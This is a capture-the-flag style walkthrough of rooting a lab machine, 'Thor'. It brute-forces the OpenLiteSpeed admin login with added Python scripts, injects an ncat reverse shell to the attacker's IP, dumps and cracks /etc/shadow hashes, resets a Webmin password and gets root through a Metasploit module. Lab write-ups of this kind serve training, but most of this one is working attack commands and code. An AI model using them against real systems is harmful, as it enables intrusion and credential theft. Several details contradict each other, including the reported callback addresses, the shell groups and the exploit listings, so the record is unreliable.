Walkthrough
Thor Walkthrough
Summary
In this guide we gain initial access through an authenticated command injection vulnerability in the OpenLiteSpeed WebServer admin console, use the exploit's choice of group to read /etc/shadow and to rewrite Webmin's user file, and finally use Metasploit to exploit an RCE in the vulnerable Webmin service and obtain root.
This walkthrough uses the following tool versions:
Kali 2022.2
nmap v7.92
cupp v3.3.0
burp suite 2022.5.1
hashcat v6.2.5
metasploit 6.2.3-dev
Enumeration
We start with an nmap scan of all TCP ports to identify open ports and the services behind them:
┌──(kali㉿kali)-[~]
└─$ nmap 192.168.120.156 -Pn -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-15 21:47 IST
Nmap scan report for 192.168.120.156
Host is up (0.0023s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
7080/tcp open empowerid
10000/tcp open snet-sensor-mgmt
Nmap done: 1 IP address (1 host up) scanned in 105.05 seconds
We see the following:
- ports 22 (SSH) and 80 (HTTP) are open
- Webmin is listening on port 10000 (nmap labels the port snet-sensor-mgmt)
- the OpenLiteSpeed WebAdmin console is listening on port 7080 (labelled empowerid)
Starting with port 80, we open a web browser and navigate to the target IP.

The site mentions a user, Jane Foster. We can generate a custom wordlist from that name with cupp (https://github.com/Mebus/cupp):
┌──(kali㉿kali)-[~]
└─$ cd cupp
┌──(kali㉿kali)-[~/thor_test/cupp]
└─$ python3 cupp.py -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: jane
> Surname: foster
................................................................
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to jane.txt, counting 392 words.
> Hyperspeed Print? (Y/n) : Y
[+] Now load your pistolero with jane.txt and shoot! Good luck!
Now we can brute-force the login with Burp Suite. We first use the proxy to intercept a login request to the WebAdmin console on port 7080; the request looks like this:
POST /login.php HTTP/1.1
Host: 192.168.120.156:7080
Cookie: LSUI37FE0C43B84483E0=2603767660ab6ea58e9fe1b961b27f66; litespeed_admin_lang=english
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.120.156:7080/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: https://192.168.120.156:7080
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
userid=admin&pass=test
We can brute-force the password with the custom wordlist jane.txt. First, we send the request to the Intruder tab and open the Positions sub-tab.
We choose the cluster bomb attack type and place payload markers on the userid and pass parameters.

Next, on the Payloads tab, we load the custom wordlist jane.txt for the first payload set.

We repeat the process for the second payload set, loading the same wordlist, and then select Start attack.

Sorting the results by status code and response length, we notice that the single 200 response belongs to the credentials admin:Foster2020.
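As an added example (not part of the original walkthrough), here is the same cluster-bomb run scripted in Python against /login.php on port 7080. It assumes the console account is admin and that the target presents a self-signed certificate; the target host and wordlist path are command-line arguments. Success is detected the same way as in Burp: by the one response whose status and length differ from all the others.

```python
"""Brute-force the OpenLiteSpeed WebAdmin login (https://<target>:7080/login.php)
with the cupp wordlist: every username x password pair, like Burp Intruder's
cluster bomb, then flag the response that differs from the rest.
Added example; not part of the original walkthrough."""
import http.client
import itertools
import ssl
from collections import Counter
from urllib.parse import urlencode

LOGIN_PATH = "/login.php"


def login_body(userid, password):
    """Form body with the same field names as the intercepted request."""
    return urlencode({"userid": userid, "pass": password})


def https_sender(host, port, timeout=5):
    """Return send(body) -> (status, body_length) that POSTs to the console.
    The console uses a self-signed certificate, so verification is disabled."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE

    def send(body):
        conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
        try:
            conn.request("POST", LOGIN_PATH, body=body, headers={
                "Content-Type": "application/x-www-form-urlencoded",
                "Referer": f"https://{host}:{port}{LOGIN_PATH}",
            })
            resp = conn.getresponse()
            return resp.status, len(resp.read())
        finally:
            conn.close()
    return send


def spray(usernames, passwords, send):
    """Try every (user, password) pair; record (status, length) for each."""
    return {(u, p): send(login_body(u, p))
            for u, p in itertools.product(usernames, passwords)}


def outliers(results):
    """Pairs whose (status, length) differs from the most common response.
    This is the manual 'sort by status/length and look for the odd row'."""
    if not results:
        return []
    common, _count = Counter(results.values()).most_common(1)[0]
    return sorted(pair for pair, resp in results.items() if resp != common)


def load_wordlist(path):
    with open(path, encoding="utf-8", errors="replace") as f:
        return [line.strip() for line in f if line.strip()]


if __name__ == "__main__":
    import sys
    target, wordlist = sys.argv[1], sys.argv[2]   # e.g. 192.168.120.156 jane.txt
    # assumption: the console account is 'admin'; add names to widen the spray
    hits = outliers(spray(["admin"], load_wordlist(wordlist), https_sender(target, 7080)))
    for user, pw in hits:
        print(f"candidate: {user}:{pw}")
```

The sender is injected into spray() so the selection logic can be exercised offline; with a real target every failed login is typically an identical response and the one valid pair stands out, which is exactly the signal the Intruder sort exposes.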
Exploitation
After logging in, we are redirected to the dashboard, which reports OpenLiteSpeed WebServer 1.7.8.

OpenLiteSpeed WebServer 1.7.8 is vulnerable to an authenticated command injection, https://www.exploit-db.com/exploits/49556: the exploit configures an external application in the admin console whose "path" the server then executes, and it takes the group to run that command under as its last argument. searchsploit has a copy:
┌──(kali㉿kali)-[~]
└─$ searchsploit Openlitespeed WebServer 1.7.8
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2) | multiple/webapps/49556.py
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We edit the IP address on line 71 of the exploit so the reverse shell points at our attacking machine:
"path" : "/usr/bin/ncat -nv 192.168.119.26 4444 -e /bin/bash",
Now we start a listener on the attacking machine:
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 4444
listening on [any] 4444 ...
Next we run the exploit with the username admin, the password Foster2020, and shadow as the group to run the injected command under:
┌──(kali㉿kali)-[~]
└─$ python3 49556.py 192.168.120.156:7080 admin Foster2020 shadow
[+] Authentication was successful!
[+] Version is detected: OpenLiteSpeed 1.7.8
[+] The target is vulnerable!
[+] tk value is obtained: 0.41951700 1615783571
[+] Sending reverse shell to 192.168.119.26:4444 ...
[+] Triggering command execution...
Finally, we catch the reverse shell on our listener. The shell runs as nobody, but with the shadow group we requested:
┌──(kali㉿kali)-[~]
└─$ sudo nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.119.26] from (UNKNOWN) [192.168.120.156] 33658
whoami
nobody
groups
shadow
We can upgrade to a more stable shell with Python:
python3 -c 'import pty; pty.spawn("/bin/bash")'
While enumerating the target, we find that the shadow group lets us read /etc/shadow, which holds the password hashes:
nobody@Lite:/usr/bin$ cat /etc/shadow
root:$6$m5SVCu8ScjUr7Byz$a4Jzk1h149Sfgv41SUIvP0zLKh1mkF6e9eHJuxG7t03/WB5zDrUl3.e7IOJ/bi1KBMmZcZ7SCuSXK7nRIT9SO1:18701:0:99999:7:::
daemon:*:18474:0:99999:7:::
bin:*:18474:0:99999:7:::
sys:*:18474:0:99999:7:::
sync:*:18474:0:99999:7:::
games:*:18474:0:99999:7:::
man:*:18474:0:99999:7:::
lp:*:18474:0:99999:7:::
mail:*:18474:0:99999:7:::
news:*:18474:0:99999:7:::
uucp:*:18474:0:99999:7:::
proxy:*:18474:0:99999:7:::
www-data:*:18474:0:99999:7:::
backup:*:18474:0:99999:7:::
list:*:18474:0:99999:7:::
irc:*:18474:0:99999:7:::
gnats:*:18474:0:99999:7:::
nobody:*:18474:0:99999:7:::
systemd-network:*:18474:0:99999:7:::
systemd-resolve:*:18474:0:99999:7:::
systemd-timesync:*:18474:0:99999:7:::
messagebus:*:18474:0:99999:7:::
syslog:*:18474:0:99999:7:::
_apt:*:18474:0:99999:7:::
tss:*:18474:0:99999:7:::
uuidd:*:18474:0:99999:7:::
tcpdump:*:18474:0:99999:7:::
avahi-autoipd:*:18474:0:99999:7:::
usbmux:*:18474:0:99999:7:::
rtkit:*:18474:0:99999:7:::
dnsmasq:*:18474:0:99999:7:::
cups-pk-helper:*:18474:0:99999:7:::
speech-dispatcher:!:18474:0:99999:7:::
avahi:*:18474:0:99999:7:::
kernoops:*:18474:0:99999:7:::
saned:*:18474:0:99999:7:::
nm-openvpn:*:18474:0:99999:7:::
hplip:*:18474:0:99999:7:::
whoopsie:*:18474:0:99999:7:::
colord:*:18474:0:99999:7:::
geoclue:*:18474:0:99999:7:::
pulse:*:18474:0:99999:7:::
gnome-initial-setup:*:18474:0:99999:7:::
gdm:*:18474:0:99999:7:::
ubuntu:$1$LeSPK8LH$krLxlta7UXiPbWtUshCjJ1:18678:0:99999:7:::
systemd-coredump:!!:18678::::::
sshd:*:18701:0:99999:7:::
thor:$6$g6IMkEpA.ojz4osB$8MC6SM8VkNNYv4N7FCHxQYY7qPjsojsuPjFxPvY96J2NfLl5/z2ZV5RDd3e4Xo/UH2Een62cXZ8rxlLww5Z4m1:18701:0:99999:7:::
lsadm:!:18701::::::
Besides root, we see the user thor, whose entry carries a sha512crypt ($6$) hash, and the locked service account lsadm (its password field is !). We save the root and thor hashes to a file and crack them with hashcat in mode 1800 (sha512crypt):
┌──(kali㉿kali)-[~]
└─$ cat hashes.txt
$6$m5SVCu8ScjUr7Byz$a4Jzk1h149Sfgv41SUIvP0zLKh1mkF6e9eHJuxG7t03/WB5zDrUl3.e7IOJ/bi1KBMmZcZ7SCuSXK7nRIT9SO1
$6$g6IMkEpA.ojz4osB$8MC6SM8VkNNYv4N7FCHxQYY7qPjsojsuPjFxPvY96J2NfLl5/z2ZV5RDd3e4Xo/UH2Een62cXZ8rxlLww5Z4m1
┌──(kali㉿kali)-[~]
└─$ hashcat -m 1800 -a 0 -o cracked.txt hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
...
...
Recovered........: 1/2 (50.00%) Digests, 1/2 (50.00%) Salts
...
...
┌──(kali㉿kali)-[~]
└─$ cat cracked.txt
$6$g6IMkEpA.ojz4osB$8MC6SM8VkNNYv4N7FCHxQYY7qPjsojsuPjFxPvY96J2NfLl5/z2ZV5RDd3e4Xo/UH2Een62cXZ8rxlLww5Z4m1:valkyrie
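Added example, not from the original walkthrough: a small parser that picks the usable entries out of a shadow dump, skips locked accounts (*, !, !!) and tags each hash with the hashcat mode for its prefix, so the file handed to hashcat contains only hashes of one format (hashcat takes a single mode per run). The sample input is built from the shadow lines above; prefixes outside the table (for example yescrypt's $y$) get mode None so they are noticed rather than fed to the wrong mode.

```python
"""Select crackable entries from /etc/shadow output and map each to the
hashcat mode for its hash format. Added example; the sample is taken from
the shadow dump in this walkthrough."""

HASHCAT_MODES = {
    "$1$": 500,     # md5crypt
    "$5$": 7400,    # sha256crypt
    "$6$": 1800,    # sha512crypt
    "$2a$": 3200,   # bcrypt variants
    "$2b$": 3200,
    "$2y$": 3200,
}


def parse_shadow(text):
    """Yield (user, hash_field) for each well-formed shadow line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        yield fields[0], fields[1]


def is_locked(hash_field):
    """'*', '!' or '!!' (or an empty field) mean there is no password to crack."""
    return hash_field == "" or hash_field[0] in "*!"


def crackable(text):
    """Return [(user, hash, mode)] for entries worth attacking; mode is None
    when the prefix is not in HASHCAT_MODES."""
    out = []
    for user, h in parse_shadow(text):
        if is_locked(h):
            continue
        mode = next((m for prefix, m in HASHCAT_MODES.items() if h.startswith(prefix)), None)
        out.append((user, h, mode))
    return out


def hashcat_lines(entries, mode):
    """Hashes of one mode only, one per line, ready to write to hashes.txt."""
    return [h for _user, h, m in entries if m == mode]


# Copied from the shadow dump above (locked and hashed entries, abridged).
SAMPLE_SHADOW = """root:$6$m5SVCu8ScjUr7Byz$a4Jzk1h149Sfgv41SUIvP0zLKh1mkF6e9eHJuxG7t03/WB5zDrUl3.e7IOJ/bi1KBMmZcZ7SCuSXK7nRIT9SO1:18701:0:99999:7:::
daemon:*:18474:0:99999:7:::
speech-dispatcher:!:18474:0:99999:7:::
ubuntu:$1$LeSPK8LH$krLxlta7UXiPbWtUshCjJ1:18678:0:99999:7:::
systemd-coredump:!!:18678::::::
thor:$6$g6IMkEpA.ojz4osB$8MC6SM8VkNNYv4N7FCHxQYY7qPjsojsuPjFxPvY96J2NfLl5/z2ZV5RDd3e4Xo/UH2Een62cXZ8rxlLww5Z4m1:18701:0:99999:7:::
lsadm:!:18701::::::
"""

if __name__ == "__main__":
    entries = crackable(SAMPLE_SHADOW)
    for user, _h, mode in entries:
        print(f"{user}: hashcat -m {mode}")
    for mode in sorted({m for _u, _h, m in entries if m is not None}):
        with open(f"hashes_{mode}.txt", "w") as f:
            f.write("\n".join(hashcat_lines(entries, mode)) + "\n")
```

Note that the ubuntu account also has a hash, but an md5crypt one ($1$); it needs a separate hashcat run with -m 500, which is why the walkthrough's -m 1800 run above only sees the root and thor digests.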
SSH
Now we can log in over SSH as thor with the password valkyrie:
┌──(kali㉿kali)-[~]
└─$ ssh thor@192.168.120.156
...
...
thor@Lite:~$
Privilege Escalation
We first look for processes running as root:
thor@Lite:~$ ps -aux | grep webmin
root 1091 0.0 1.0 37892 10760 ? Ss 15:51 0:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
thor 48471 0.0 0.0 6432 656 pts/0 S+ 19:21 0:00 grep --color=auto webmin
We see that webmin (miniserv.pl) is running as root.
In /usr/share/webmin/ we look at the Perl script changepass.pl:
thor@Lite:/usr/share/webmin$ ls -la /usr/share/webmin/changepass.pl
-rwxr-xr-x 1 root root 2228 Nov 10 2020 /usr/share/webmin/changepass.pl
The file is owned by root:root. Its mode (755) also makes it readable by everyone, so thor could read it directly; we nevertheless reuse the exploit with the group set to root to read it from the nobody shell.
Again, we first start the listener:
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 4444
listening on [any] 4444 ...
and run the exploit:
┌──(kali㉿kali)-[~]
└─$ python3 49556.py 192.168.120.156:7080 admin Foster2020 root
[+] Authentication was successful!
[+] Version is detected: OpenLiteSpeed 1.7.8
[+] The target is vulnerable!
[+] tk value is obtained: 0.26482300 1615960561
[+] Sending reverse shell to 127.0.0.1:4444 ...
[+] Triggering command execution...
We receive the connection on the listener:
┌──(kali㉿kali)-[~/thor_test]
└─$ sudo nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.119.26] from (UNKNOWN) [192.168.120.156] 48502
whoami
nobody
groups
bin
python3 -c 'import pty; pty.spawn("/bin/bash")'
Now we can view the contents of changepass.pl:
nobody@Lite:/usr/bin$ cat /usr/share/webmin/changepass.pl
```perl
#!/usr/bin/perl
# changepass.pl
# Script for the user to change their webmin password
# Check command line arguments
usage() if (@ARGV != 3);
($config, $user, $pass) = @ARGV;
if (!-d $config) {
print STDERR "The config directory $config does not exist\n";
exit 2;
}
if (!open(CONF, "<$config/miniserv.conf")) {
print STDERR "Failed to open $config/miniserv.conf : $!\n";
print STDERR "Maybe $config is not the Webmin config directory.\n";
exit 3;
}
while(<CONF>) {
if (/^([^=]+)=(\S+)/) { $config{$1} = $2; }
}
close(CONF);
# Update the users file
if (!open(USERS, "<".$config{'userfile'})) {
print STDERR "Failed to open Webmin users file $config{'userfile'} : $!\n";
exit 4;
}
while(<USERS>) {
s/\r|\n//g;
local @user = split(/:/, $_);
if (@user) {
$users{$user[0]} = \@user;
push(@users, $user[0]);
}
}
close(USERS);
$uinfo = $users{$user};
if (!defined($uinfo)) {
print STDERR "The Webmin user $user does not exist\n";
print STDERR "The users on your system are: ",join(" ", @users),"\n";
exit 5;
}
srand(time() ^ $$);
$salt = chr(int(rand(26))+65).chr(int(rand(26))+65);
$uinfo->[1] = crypt($pass, $salt);
$uinfo->[6] = time();
if (!open(USERS, ">$config{'userfile'}")) {
print STDERR "Failed to open Webmin users file $config{'userfile'} : $!\n";
exit 6;
}
foreach $v (values %users) {
print USERS join(":", @$v),"\n";
}
close(USERS);
print "Updated password of Webmin user $user\n";
# Send a signal to have miniserv reload it's config
if (open(PID, "<".$config{'pidfile'})) {
$pid = <PID>;
$pid =~ s/\r|\n//;
close(PID);
if (!$pid) {
print STDERR "Webmin is not running - cannot refresh configuration\n";
}
elsif (!kill('USR1', $pid)) {
print STDERR "Failed to signal process $pid - cannot refresh configuration\n";
}
}
else {
print STDERR "Webmin is not running - cannot refresh configuration\n";
}
sub usage
{
print STDERR <<EOF;
usage: changepass.pl <config-dir> <login> <password>
This program allows you to change the password of a user in the Webmin
password file. For example, to change the password of the admin user
to foo, you would run:
changepass.pl /etc/webmin admin foo
This assumes that /etc/webmin is the Webmin configuration directory.
EOF
exit 1;
}
```
The script reads miniserv.conf to find the Webmin users file (the userfile setting), then rewrites that file, miniserv.users, with a new crypt() hash for the chosen user. Both files live in /etc/webmin:
thor@Lite:~$ ls -l /etc/webmin/miniserv.conf
-rw-rw---- 1 root bin 979 Mar 16 22:46 /etc/webmin/miniserv.conf
thor@Lite:~$ ls -l /etc/webmin/miniserv.users
-rw-rw---- 1 root bin 9 Mar 16 22:40 /etc/webmin/miniserv.users
Since the bin group has read and write access to both files, we can reuse the exploit once more, this time with the group bin.
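The reason the group argument matters is that the injected command always runs as nobody, so the only extra access we gain is whatever the chosen group grants: shadow for /etc/shadow earlier, bin for the Webmin files here. As an added example (not part of the original walkthrough) the script below generalises that choice: it walks one or more directory trees and reports, per group, the regular files where the group permission bits grant read or write access that the world bits do not. Its demo tree is constructed to mirror the modes of the files seen on the target (shadow 0640, miniserv.users 0660, changepass.pl 0755); the group it reports is whatever group the files are created under on the machine running it, not shadow or bin.

```python
"""Which group should we ask the OpenLiteSpeed exploit to run us under?
The payload runs as nobody with a group of our choosing, so the useful groups
are those whose members get read or write access that 'other' does not have.
Added example; not part of the original walkthrough."""
import grp
import os
import stat
import tempfile


def group_name(gid):
    try:
        return grp.getgrgid(gid).gr_name
    except KeyError:          # gid with no /etc/group entry (e.g. containers)
        return str(gid)


def group_only_access(path):
    """(group, readable, writable) if the group bits grant something the world
    bits do not; None for non-regular files or nothing interesting."""
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        return None
    mode = st.st_mode
    readable = bool(mode & stat.S_IRGRP) and not (mode & stat.S_IROTH)
    writable = bool(mode & stat.S_IWGRP) and not (mode & stat.S_IWOTH)
    if not (readable or writable):
        return None
    return group_name(st.st_gid), readable, writable


def groups_worth_requesting(roots):
    """Map group -> {'read': [...], 'write': [...]} over the directory trees."""
    found = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    info = group_only_access(path)
                except OSError:   # unreadable metadata, vanished file, etc.
                    continue
                if info is None:
                    continue
                group, readable, writable = info
                entry = found.setdefault(group, {"read": [], "write": []})
                if readable:
                    entry["read"].append(path)
                if writable:
                    entry["write"].append(path)
    for entry in found.values():
        entry["read"].sort()
        entry["write"].sort()
    return found


def make_demo_tree():
    """Constructed stand-in for the target: files with the modes of /etc/shadow
    (0640), miniserv.users (0660), changepass.pl (0755) and a private key (0600).
    Returns (directory, group the files ended up in)."""
    d = tempfile.mkdtemp(prefix="thor_demo_")
    for name, mode in (("shadow", 0o640), ("miniserv.users", 0o660),
                       ("changepass.pl", 0o755), ("id_rsa", 0o600)):
        path = os.path.join(d, name)
        with open(path, "w") as f:
            f.write("x\n")
        os.chmod(path, mode)
    return d, group_name(os.stat(os.path.join(d, "shadow")).st_gid)


if __name__ == "__main__":
    import sys
    roots = sys.argv[1:] or ["/etc"]
    for group, access in sorted(groups_worth_requesting(roots).items()):
        print(f"{group}: read-only-for-group={len(access['read'])} "
              f"writable-for-group={len(access['write'])}")
        for path in access["write"][:5]:
            print("   w", path)
```

Run against /etc on a Debian-style host it lists shadow next to /etc/shadow and /etc/gshadow; on this target it would also list bin next to the two miniserv files, which is how the walkthrough's group choices fall out. changepass.pl never appears because a world-readable file gives a group nothing extra.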
Again, we first start the listener:
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 4444
listening on [any] 4444 ...
and run the exploit:
┌──(kali㉿kali)-[~/thor_test]
└─$ python3 49556.py 192.168.120.156:7080 admin Foster2020 bin
[+] Authentication was successful!
[+] Version is detected: OpenLiteSpeed 1.7.8
[+] The target is vulnerable!
[+] tk value is obtained: 0.38517800 1615960791
[+] Sending reverse shell to 127.0.0.1:4444 ...
[+] Triggering command execution...
We receive the connection on the listener; this time the shell's group is bin, so we can run changepass.pl against /etc/webmin and set the password of the Webmin user root to pwn:
┌──(kali㉿kali)-[~/thor_test]
└─$ sudo nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.119.26] from (UNKNOWN) [192.168.120.156] 48502
whoami
nobody
groups
bin
python3 -c 'import pty; pty.spawn("/bin/bash")'
nobody@Lite:/usr/bin$ /usr/share/webmin/changepass.pl /etc/webmin root pwn
Updated password of Webmin user root
We also check what thor may run with sudo:
thor@Lite:~$ sudo -l
Matching Defaults entries for thor on lite:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User thor may run the following commands on lite:
(root) NOPASSWD: /usr/bin/systemctl restart webmin
thor may restart the webmin service as root without a password. changepass.pl tries to make miniserv reload its configuration with SIGUSR1, but an unprivileged nobody process cannot signal a root-owned process, so this restart is what makes the new password take effect:
thor@Lite:~$ sudo /usr/bin/systemctl restart webmin
Back in searchsploit, we find there is a Metasploit module for Webmin (https://www.exploit-db.com/exploits/49318):
┌──(kali㉿kali)-[~]
└─$ searchsploit webmin
.....................
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) | linux/webapps/47330.rb
We start Metasploit:
┌──(kali㉿kali)-[~]
└─$ msfconsole -q
msf6 >
We use the webmin_packageup_rce module, authenticate with the Webmin credentials we just set (root:pwn), and receive a shell as root:
msf6 > use exploit/linux/http/webmin_packageup_rce
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_packageup_rce) > set rhosts 192.168.120.156
rhosts => 192.168.120.156
msf6 exploit(linux/http/webmin_packageup_rce) > set lhost eth0
lhost => eth0
msf6 exploit(linux/http/webmin_packageup_rce) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 exploit(linux/http/webmin_packageup_rce) > set lport 1411
lport => 1411
msf6 exploit(linux/http/webmin_packageup_rce) > set username root
username => root
msf6 exploit(linux/http/webmin_packageup_rce) > set password pwn
password => pwn
msf6 exploit(linux/http/webmin_packageup_rce) > exploit
[*] Started reverse TCP handler on 192.168.119.26:1411
[+] Session cookie: a0d87bc4983b1725beedff423a01cbc3
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (192.168.120.156:1411 -> 192.168.43.130:34814) at 2021-03-17 11:34:41 +0530
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)